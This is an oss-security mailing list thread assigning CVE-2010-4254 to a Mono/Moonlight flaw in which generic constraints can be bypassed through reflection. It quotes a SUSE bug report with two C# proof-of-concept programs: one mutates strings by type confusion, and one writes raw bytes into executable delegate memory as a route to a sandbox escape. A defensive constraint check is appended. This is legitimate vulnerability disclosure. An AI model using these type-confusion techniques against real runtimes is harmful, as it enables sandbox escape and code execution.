
List:       oss-security
Subject:    Re: [oss-security] CVE request: mono/moonlight: execution of
From:       Josh Bressers <bressers () redhat ! com>
Date:       2010-11-29 20:36:20
Message-ID: 1544809689.736861291062980367.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
[Download RAW message or body]

Please use CVE-2010-4254 for this.

Thanks.

-- 
    JB


----- "Thomas Biege" <thomas@suse.de> wrote:

> Hello.
> 
> Just a copy-n-paste from our bugzilla (again):
> 
> ------------------------------------------------------------------------------
> SP 2010-11-24 20:45:21 UTC
> 
> Original (pulled by author) blog entry:
> 
> So I was messing around with generic methods and discovered that generic
> constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection (with the
> exception of the new() constraint). One of the fun results of this bug is that
> the String class can be made mutable without using reflection to set private
> members!
> 
> The following code demonstrates this; it is legal and will run on Mono up to
> and including version 2.8:
> 
> using System;
> using System.Reflection;
> 
> public class FakeString {
>     public int length;
>     public char start_char;
> }
> 
> public class TestCase {
>     // Constrained generic method: T must derive from FakeString.
>     private static FakeString UnsafeConversion<T>(T thing)
>         where T : FakeString
>     {
>         return thing;
>     }
> 
>     public static void Main() {
>         var a = "foo";
>         var b = MakeMutable(a);
> 
>         Console.WriteLine(a);
>         b.start_char = 'b';   // writes straight into the string's storage
>         Console.WriteLine(a);
>     }
> 
>     private static FakeString MakeMutable(string s)
>     {
>         var m = typeof(TestCase).GetMethod("UnsafeConversion",
>             BindingFlags.NonPublic | BindingFlags.Static);
>         // string does not satisfy "where T : FakeString"; a correct runtime
>         // rejects this instantiation, the affected Mono versions accept it.
>         var m2 = m.MakeGenericMethod(typeof(string));
> 
>         var d = (Func<string, FakeString>)Delegate.CreateDelegate(
>             typeof(Func<string, FakeString>), null, m2);
> 
>         return d(s);
>     }
> }
> 
> 
> 
> Comment 1 SP 2010-11-24 20:54:20 UTC
> 
> This is a follow up of the previous
> https://bugzilla.novell.com/show_bug.cgi?id=654136
> 
> The original blog entry allows trusted (by moonlight) code to mutate strings
> which could be used to trick policies (e.g. give a valid URL and, once accepted
> as a valid xdomain URL, change it to something else).
> 
> It can also be extended to arbitrary code execution. POC by Geoff Norton:
> 
> using System;
> using System.Reflection;
> using System.Runtime.InteropServices;
> 
> public class DelegateWrapper {
>     public IntPtr method_ptr;
> }
> 
> public delegate void MethodWrapper ();
> 
> public class BreakSandbox {
>     // Constrained generic method: T must derive from DelegateWrapper.
>     private static DelegateWrapper Convert <T> (T dingus) where T : DelegateWrapper {
>         return dingus;
>     }
> 
>     private static DelegateWrapper ConvertDelegate (Delegate del) {
>         var m = typeof (BreakSandbox).GetMethod ("Convert",
>             BindingFlags.NonPublic | BindingFlags.Static);
>         // Delegate does not satisfy the constraint; affected Mono accepts it,
>         // so the delegate object is reinterpreted as a DelegateWrapper.
>         var gm = m.MakeGenericMethod (typeof (Delegate));
> 
>         var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate (
>             typeof (Func <Delegate, DelegateWrapper>), null, gm);
> 
>         return d (del);
>     }
> 
>     public static void Main (string [] args) {
>         MethodWrapper d = delegate {
>             Console.WriteLine ("Hello");
>         };
> 
>         d ();
>         var converted = ConvertDelegate (d);
>         // Overwrite the already WX page with a 'ret'
>         Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
>         d ();
>     }
> }
> 
> This code won't execute on Moonlight (since all Marshal.* code is
> SecurityCritical) but it would not be hard to modify the POC to do the same
> without SecurityCritical code.
> 
> Note: the bug is present in Mono but does not represent a security
> vulnerability there since Mono (unlike Moonlight) can only execute trusted
> code.
> 
> ------------------------------------------------------------------------------
> 
> -- 
>  Thomas Biege <thomas@suse.de>, SUSE LINUX, Security Support &
> Auditing
>  SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
>   Whoever stops wanting to get better stops being good.
>                             -- Marie von Ebner-Eschenbach
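The two quoted PoCs rely on MakeGenericMethod accepting a type argument that violates the method's constraint. As an added example (not part of the thread or of Mono's code), the following C# self-check does two things a maintainer or an application author can use: it verifies that the current runtime rejects such an instantiation with ArgumentException, and it shows a manual constraint check that code performing reflective generic instantiation can run itself before trusting the runtime. The names Base, Other, Identity and ConstraintCheck are assumptions made up for the example.

```csharp
using System;
using System.Reflection;

// Added example, not from the bug report: constraint enforcement check.
public class Base { }
public class Other { }

public static class ConstraintCheck {
    // Same shape as the reported PoC: a base-class constraint on T.
    private static Base Identity<T>(T thing) where T : Base { return thing; }

    // Manual check: each type argument must be assignable to every
    // constraint type declared on the corresponding type parameter.
    // (Does not cover the class/struct/new() special constraints, which
    // live in GenericParameterAttributes rather than in constraint types.)
    public static bool SatisfiesConstraints(MethodInfo genericDef, Type[] args) {
        var parameters = genericDef.GetGenericArguments();
        if (parameters.Length != args.Length) return false;
        for (int i = 0; i < parameters.Length; i++) {
            foreach (var c in parameters[i].GetGenericParameterConstraints()) {
                if (!c.IsAssignableFrom(args[i])) return false;
            }
        }
        return true;
    }

    // True if the runtime rejects the violating instantiation (expected on
    // a correct runtime); false if it is accepted, which is the behaviour
    // the thread describes for Mono up to 2.8.
    public static bool RuntimeEnforcesConstraints() {
        var def = typeof(ConstraintCheck).GetMethod("Identity",
            BindingFlags.NonPublic | BindingFlags.Static);
        try {
            def.MakeGenericMethod(typeof(Other));
            return false;
        } catch (ArgumentException) {
            return true;
        }
    }

    public static void Main() {
        var def = typeof(ConstraintCheck).GetMethod("Identity",
            BindingFlags.NonPublic | BindingFlags.Static);
        Console.WriteLine("manual check, Base:  " + SatisfiesConstraints(def, new[] { typeof(Base) }));
        Console.WriteLine("manual check, Other: " + SatisfiesConstraints(def, new[] { typeof(Other) }));
        Console.WriteLine("runtime enforces constraints: " + RuntimeEnforcesConstraints());
    }
}
```

On a fixed runtime the last line prints true; printing false reproduces the constraint bypass this CVE covers without needing either PoC's memory-unsafe payload.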